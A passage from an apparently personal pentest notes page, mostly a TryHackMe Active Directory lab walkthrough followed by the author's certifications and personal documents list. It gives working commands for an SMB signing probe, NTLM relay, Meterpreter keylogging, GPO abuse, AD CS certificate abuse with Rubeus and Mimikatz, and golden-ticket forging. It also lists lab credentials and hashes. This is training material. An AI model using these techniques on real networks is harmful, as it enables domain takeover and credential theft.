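        return "enabled"       # supported but not required: relay target (member server default)
    return "disabled"


def probe(host, port=445, timeout=5):
    """Live check against one host: send NEGOTIATE, read one reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        nb = s.recv(4)
        length = struct.unpack(">I", nb)[0] & 0xFFFFFF
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                raise ConnectionError("short read")
            data += chunk
    mode, dialect = parse_negotiate_response(nb + data)
    return signing_posture(mode), dialect


def fake_negotiate_response(security_mode, dialect=0x0302):
    """Constructed server reply (not captured traffic) so the parser can be
    exercised offline: 65-byte NEGOTIATE response body, empty security buffer."""
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0) + b"\x00" * 16   # ..., ServerGuid
    body += struct.pack("<IIII", 0, 0x800000, 0x800000, 0x800000)   # Capabilities, MaxTransact/Read/Write
    body += struct.pack("<QQ", 0, 0)                                  # SystemTime, ServerStartTime
    body += struct.pack("<HHI", 128, 0, 0) + b"\x00"                  # SecurityBuffer off/len, ctx offset, Buffer
    return netbios(smb2_header(SMB2_NEGOTIATE, flags=0x1) + body)      # 0x1 = SERVER_TO_REDIR


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        posture, dialect = probe(target)
        print(f"{target}: signing {posture}, dialect 0x{dialect:04x}")
```

Run it as `python3 smbsign.py thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc`; "enabled" is the answer that makes the relay in the next step work, "required" means pick another target.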
=====Exploiting Authentication Relays
We want to relay THMSERVER2's NTLM authentication to THMSERVER1, because THMSERVER2's computer account has administrative privileges over THMSERVER1 (from the BloodHound query above).
Use SpoolSample.exe to connect to THMSERVER2's spooler and tell it to authenticate back to us (MS-RPRN RpcRemoteFindFirstPrinterChangeNotification)
ntlmrelayx relays that machine-account authentication to THMSERVER1, which sees a connection as THMSERVER2$ and grants it administrative access (ntlmrelayx dumps the SAM by default; use -c to run a command instead)
`ntlmrelayx.py -smb2support -t smb://"10.200.60.201" -debug`
THMWRK1 RDP> C:\Tools\SpoolSample.exe thmserver2.za.tryhackme.loc "kali-vpn-ip"
Exploiting AD Users: Hunting for Credentials
=====Using Meterpreter's Keylogger
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
=====KeePass Vault file
got .kdbx file password: Imreallysurenoonewillguessmypassword
`apt install -y kpcli`
`kpcli`
kpcli:/> open PasswordDatabase.kdbx
kpcli:/> ls
kpcli:/> ls PasswordDatabase/*
kpcli:/> show -f -a PasswordDatabase/General/Flag
THM{AD.Users.Can.Give.Up.Good.Secrets}
kpcli:/> show -f -a PasswordDatabase/General/svcServMan
Sup3rStr0ngPass!@
Exploiting Group Policy Objects
BloodHound shows that svcServMan owns a GPO (the Management Server GPO linked to the Servers > Management Servers OU), so we can edit it.
note: GPO settings live in SYSVOL on the domain controllers and are pulled by every machine the GPO is linked to, so editing the GPO changes what gets applied on THMSERVER2 at its next refresh (gpupdate, or the default 90-minute interval).
RDP into THMWRK1 as a standard domain user or T2 admin
`xfreerdp /v:thmwrk1.za.tryhackme.loc /u:username /p:'password'`
Inject the svcServMan credential as a network-only credential (runas /netonly does not verify the password locally, so a typo only shows up as access denied later)
`runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe`
open `mmc.exe` in the new cmd window and add the Group Policy Management snap-in
Edit the GPO that applies to THMSERVER2 via MMC:
Console_Root>>Group_Policy_Management>>Forest:tryhackme.loc>>Domains>>za.tryhackme.loc>>Servers>>Management_Servers>>Management_Server (right-click > Edit)
Computer_Configuration>>Policies>>Windows_Settings>>Security_Settings>>Restricted_Groups>>Add_Group>>Browse>>Search "IT Support">>OK
Under "This group is a member of", add Administrators and Remote Desktop Users, which makes "IT Support" local admin and RDP user on THMSERVER2
Now the low-privileged user from http://distributor.za.tryhackme.loc/creds (a member of IT Support, since we added it under Permission Delegation) can RDP to THMSERVER2 as a local administrator once the policy has applied
Exploiting Certificates (AD CS)
`certutil -Template -v > .\templates.txt`
A certificate template can be exploited (ESC1-style) if all of the following are present:
Client Authentication: the template's Extended Key Usage allows the certificate to be used for client authentication (Kerberos PKINIT logon)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: the requester can supply the subject / an alternate SAN, i.e. any UPN such as Administrator
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY: the private key can be exported along with the certificate (needed to move the .pfx to where Rubeus runs)
Certificate Permissions: our user (or a group we are in) has Enroll permission on the template
=====Exploit a Certificate Template
Launch mmc.exe and add the Certificates snap-in (current user).
Personal>>Certificates>>right-click>>All Tasks>>Request New Certificate, pick the vulnerable template and, under Properties>>Subject, add an Alternative name of type User principal name: Administrator@za.tryhackme.loc before enrolling.
Export the issued certificate with its private key to a password-protected .pfx.
# Use Rubeus to request a TGT with the certificate (PKINIT)
`Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\username\Desktop\mycert.pfx /password:password123 /outfile:pwnz.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101`
# Use Mimikatz to Pass-the-Ticket
`mimikatz.exe "privilege::debug" "kerberos::ptt pwnz.kirbi" "misc::cmd"`
launch `explorer.exe` from the new cmd window so it inherits the injected ticket
Now we can browse the \\thmdc.za.tryhackme.loc\C$ file system as Administrator
Exploiting Domain Trusts
A forest, in Active Directory terms, is comprised of one or more domain trees. Trusts define how the domains in a forest can authenticate to one another.
The main properties of trusts are:
Directional: trust flows from a trusting domain to a trusted domain (one-way or two-way); parent-child trusts inside a forest are two-way
Transitive: trust extends through a chain of trusted domains (child -> parent -> other child)
=====Golden Tickets
If an attacker compromises a domain controller and gains full SYSTEM rights, the krbtgt account's hash can be extracted (DCSync needs only replication rights, not a DC shell). With it the attacker can forge TGTs (golden tickets) for any user and then request TGS tickets for any resource, for as long as the krbtgt password has not been rotated twice.
In order to create golden tickets, the following must be known:
FQDN of the domain
SID of the domain
Username to impersonate
KRBTGT hash
mimikatz # lsadump::dcsync /user:za\krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
/sid is the child (za) domain SID (S-1-5-21-x-y-z with no trailing RID; check with Get-ADDomain za.tryhackme.loc) and /sids adds an extra SID to the ticket's SID history: the parent (tryhackme.loc) domain SID with RID 519, Enterprise Admins. Because the parent-child trust is two-way transitive and SID filtering is not enforced inside a forest, the forged ticket is accepted as Enterprise Admin in the root domain.
now verify by browsing the root DC file system \\thmrootdc.tryhackme.loc\C$
9 machine notes need to write
Due to OFFSEC company policy, disclosure of any content/lab is limited/forbidden.
PWK-200 course and lab status screenshot.png
mind of steel, and more:
I am not getting the OSCP until I get it.
Some say I can, some say I can't, people are always saying something, but steel won't listen or even look at them, which means steel did not hear or see anything.
Steel rusts, brains also rust, that's why we rest; we need more than just steel.
4 ctf notes need to write
step 1
step 2
step 2
69 ctf notes need to write
step 1
step 2
step 2
==========My_Contact==========
[Linkedin] [Discord]
==========Certifications==========
Offensive Security Certified Professional(OSCP).pdf
elearnsecurity Junior Penetration Tester certification.pdf
Certified in Cybersecurity.pdf
Cisco Certified Internetwork Expert(Security).pdf
Cisco Certified Network Professional(Enterprise).pdf
==========Documents==========
Palo Alto Networks Systems Engineer (PSE)_ Foundation.pdf
Qualys Endpoint Detection and Response-Foundation.JPG
AWVS-Technical.pdf
BMI™ IQ Certificate.pdf
BMI™ Performance Report.pdf
Shanghai Metro station 2016 annual best volunteer.JPG
Shanghai Metro station volunteer.jpg
Chinese Bachelor degree certificate-original.jpg
Chinese College Graduation certificate-original.jpg
Chinese College Transcript-original.jpg
Chinese Mandarin Rank Examination original.jpg
Chinese National College English Test(CET).jpg
Chinese National Computer Rank Examination original.jpg
Chinese_Name:YUJIN ZHOU
Books I have read: Thiaoouba_Prophecy, Ami-1-Child-of-the-Stars, Ami-2-Returns, Ami-3-InternalCivilisations, The Ascension Papers - 2nd Edition
Am I worthy to set foot on the land of the free?